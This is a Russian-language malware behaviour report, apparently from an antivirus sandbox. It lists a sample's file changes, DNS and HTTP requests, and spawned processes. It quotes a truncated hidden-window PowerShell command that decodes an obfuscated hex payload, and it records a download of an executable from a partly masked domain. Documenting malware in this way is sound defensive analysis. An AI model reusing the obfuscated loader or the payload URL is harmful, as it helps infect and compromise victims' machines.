Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function mcbb6 {param($md7db)$r642f3='ga26ef1';$wd3a9='';for ($i=0; $i -lt $md7db.length;$i+=2){$q6ab8=[convert]::ToByte($md7db.Substring($i,2),16);$wd3a9+=[char]($q6ab8 -...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\spqavbar.0.cs
- %TEMP%\spqavbar.cmdline
- %TEMP%\spqavbar.out
- %TEMP%\csc513f.tmp
- %TEMP%\res515f.tmp
- %TEMP%\spqavbar.dll
- %APPDATA%\r196de.exe
Удаляет следующие файлы
- %TEMP%\res515f.tmp
- %TEMP%\csc513f.tmp
- %TEMP%\spqavbar.0.cs
- %TEMP%\spqavbar.dll
- %TEMP%\spqavbar.pdb
- %TEMP%\spqavbar.cmdline
- %TEMP%\spqavbar.out
Сетевая активность
TCP
Запросы HTTP GET
- http://pl##tech.id/do/trooooo.exe
- http://pl##tech.id/cgi-sys/suspendedpage.cgi
UDP
- DNS ASK pl##tech.id
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function mcbb6 {param($md7db)$r642f3='ga26ef1';$wd3a9='';for ($i=0; $i -lt $md7db.length;$i+=2){$q6ab8=[convert]::ToByte($md7db.Substring($i,2),16);$wd3a9+=[char]($q6ab8 -...' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\spqavbar.cmdline"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES515F.tmp" "%TEMP%\CSC513F.tmp"' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\spqavbar.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES515F.tmp" "%TEMP%\CSC513F.tmp"
